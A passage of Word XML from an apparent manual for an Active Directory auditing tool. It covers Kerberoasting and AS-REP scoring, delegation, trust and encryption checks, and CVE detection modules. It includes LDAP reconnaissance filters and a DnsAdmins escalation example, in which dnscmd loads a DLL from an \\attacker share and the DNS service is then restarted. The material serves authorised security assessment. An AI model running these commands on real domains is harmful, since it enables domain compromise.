          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The SPN scanner discovers all accounts with Service Principal Names and scores each for Kerberoasting feasibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LDAP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(&amp;(servicePrincipalName=*)(!(objectClass=computer))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scoring Algorithm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Each SPN account receives a composite score (0–100) based on the following weighted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Factor</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Weight</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Encryption Type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+40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RC4-only SPNs are trivially crackable; AES-only reduces score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Password Age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+25</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Accounts with passwords older than 2 years score highest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Admin Membership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+20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Domain Admins, Enterprise Admins, or other privileged groups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Service Type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+35</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MSSQL, HTTP, and exchange SPNs score higher than krbtgt or host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Logon History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+10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Recently active accounts indicate the service is live</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The SPN scanner outputs a table of discovered SPNs sorted by score (highest first), with columns for the account name, SPN value, encryption type, password last set date, group memberships, and composite score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 AS-REP Scanner (--asrep)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The AS-REP scanner identifies accounts that do not require Kerberos pre-authentication, making them vulnerable to offline brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LDAP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(&amp;(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(objectClass=computer)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REP accounts receive a flat score: 75 for standard user accounts and 90 for accounts in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, Account Operators, Server Operators).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Delegation Mapper (--delegation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The delegation mapper discovers all three forms of Kerberos delegation configured in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.1 Unconstrained Delegation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Accounts with the TRUSTED_FOR_DELEGATION flag (userAccountControl bit 524288) can impersonate any user to any service. This is the highest-risk delegation type and a common path to domain compromise via the printer bug or PetitPotam.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2 Constrained Delegation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Accounts with msDS-AllowedToDelegateTo set can impersonate users only to the listed SPNs. If TRUSTED_TO_AUTH_FOR_DELEGATION is also set, the account can perform protocol transition (S4U2Self + S4U2Proxy), which removes the requirement for the user to authenticate first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.3 Resource-Based Constrained Delegation (RBCD)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Accounts listed in msDS-AllowedToActOnBehalfOfOtherIdentity on a target machine can impersonate users to that machine. RBCD is writable by the machine account owner, making it a frequent target for privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 User Enumerator (--users)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The user enumerator performs a series of LDAP queries to build a comprehensive picture of the domain’s user landscape.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks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Check</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Privileged Users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Members of Domain Admins, Enterprise Admins, Schema Admins, Backup Operators, Account Operators, Server Operators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Stale Accounts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Accounts that have not logged in for 90+ days but remain enabled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Password Policy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Fine-grained password policies (msDS-PasswordSettings) and default domain policy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Domain Trusts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All trust relationships visible from the current domain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DnsAdmins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Members of the DnsAdmins group (potential DLL injection path)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LAPS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Whether LAPS is deployed (ms-Mcs-AdmPwd attribute exists on computer objects)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GPO Links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Group Policy Objects linked to the domain root and their security filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DnsAdmins Escalation Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If kerb-map discovers accounts in the DnsAdmins group, it flags a potential privilege escalation path. Members of DnsAdmins can configure the DNS service to load an arbitrary DLL on the next service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dnscmd dc01.corp.local /config /serverlevelplugindll \\attacker\share\payload.dll</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sc \\dc01.corp.local stop dns</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sc \\dc01.corp.local start dns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Encryption Auditor (--encryption)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The encryption auditor queries msDS-SupportedEncryptionTypes on all user and computer accounts to identify weak Kerberos encryption configurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks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Check</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Severity</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RC4-only Accounts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HIGH</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Accounts that only support RC4_HMAC_MD5 (etype 23), trivially crackable offline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DES Accounts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CRITICAL</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Accounts with DES-CBC enabled — a deprecated cipher broken decades ago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Weak DCs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HIGH</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Domain controllers advertising RC4 or DES support in their encryption types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RC4-only accounts and weak DCs receive a score of 65. DES-enabled accounts receive a score of 60. These scores place encryption findings in the upper-mid range of the priority engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 Trust Mapper (--trusts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The trust mapper discovers all Active Directory trust relationships and assesses their risk based on type, direction, and security attributes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LDAP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(objectClass=trustedDomain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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Condition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Severity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Forest trust + no SID filtering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CRITICAL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Cross-forest trust without SID filtering allows SID history injection from the trusted forest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Bidirectional + no SID filtering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HIGH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Two-way trust without SID filtering enables lateral movement in both directions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Bidirectional trust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MEDIUM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Standard bidirectional trust with SID filtering — users from either domain can authenticate to the other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RC4 trust encryption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LOW</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Trust configured to use RC4 instead of AES — increases offline attack surface on inter-realm TGTs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 5 — CVE Detection Modules (--cves)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The --cves flag enables a suite of vulnerability checks targeting known Active Directory CVEs. By default, only safe (LDAP-query-based) checks run. The --aggressive flag enables checks that send non-standard network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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000"/>
        <w:gridCol w:w="2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Module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CVE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Aggressive?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noPac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CVE-2021-42278 / CVE-2021-42287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LDAP query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AD CS (ESC1–ESC8)</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Multiple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LDAP query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ZeroLogon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CVE-2020-1472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Netlogon RPC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PrintNightmare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CVE-2021-1675 / CVE-2021-34527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RPC spoolss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PetitPotam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CVE-2021-36942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RPC EFSRPC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MS14-068</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CVE-2014-6324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LDAP version check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GPP Passwords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MS14-025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SMB SYSVOL read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Bronze Bit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CVE-2020-17049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LDAP query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Certifried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CVE-2022-26923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LDAP query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LDAP Signing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N/A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LDAP query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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 noPac (CVE-2021-42278 / CVE-2021-42287)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks whether the domain controller is vulnerable to the sAMAccountName spoofing attack. kerb-map queries the DC’s operating system version and installed hotfixes via LDAP. If the November 2021 patches are missing, the finding is flagged as CRITICAL (score 95).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation allows any domain user to impersonate the domain controller and perform DCSync.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 AD CS ESC1–ESC8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queries Active Directory Certificate Services enrollment endpoints and certificate templates via LDAP. Each escalation path (ESC1 through ESC8) is checked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ESC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Vulnerability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ESC1</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Template allows requestor to specify a Subject Alternative Name (SAN)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ESC2</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Template defines a subordinate CA certificate (Any Purpose EKU)</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ESC3</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Enrollment agent template with unprotected issuance policy</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ESC4</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Overly permissive ACLs on certificate templates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ESC5</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Vulnerable PKI object ACLs (CA server, RootCA, NTAuthCertificates)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ESC6</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CA has EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled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ESC7</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CA manager approval bypass via ManageCA or ManageCertificates permissions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ESC8</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HTTP enrollment endpoint without HTTPS or EPA enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 ZeroLogon (CVE-2020-1472) [Aggressive]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sends a Netlogon authentication attempt with an all-zero client credential to detect whether the DC is vulnerable to the ZeroLogon privilege escalation. The check stops after the first successful handshake and does not modify the DC’s machine account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5B6" w:sz="12"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0F7FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">NOTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Although this check does not change the machine password, it does complete a Netlogon handshake with crafted data. Some EDR products will flag this as an attempted exploit. Run only with explicit authorisation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 PrintNightmare (CVE-2021-1675 / CVE-2021-34527) [Aggressive]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Connects to the DC’s Print Spooler RPC interface and checks whether the AddPrinterDriverEx call is accessible to authenticated users. If the spooler is enabled and the patch is missing, the finding is flagged as CRITICAL (score 95).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 PetitPotam (CVE-2021-36942) [Aggressive]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Calls EfsRpcOpenFileRaw on the DC’s EFSRPC interface with a UNC path pointing to the attacker’s host. If the DC attempts to connect back, it confirms coerced authentication is possible. This is particularly dangerous when combined with an NTLM relay to AD CS (ESC8).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6 MS14-068 (CVE-2014-6324)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
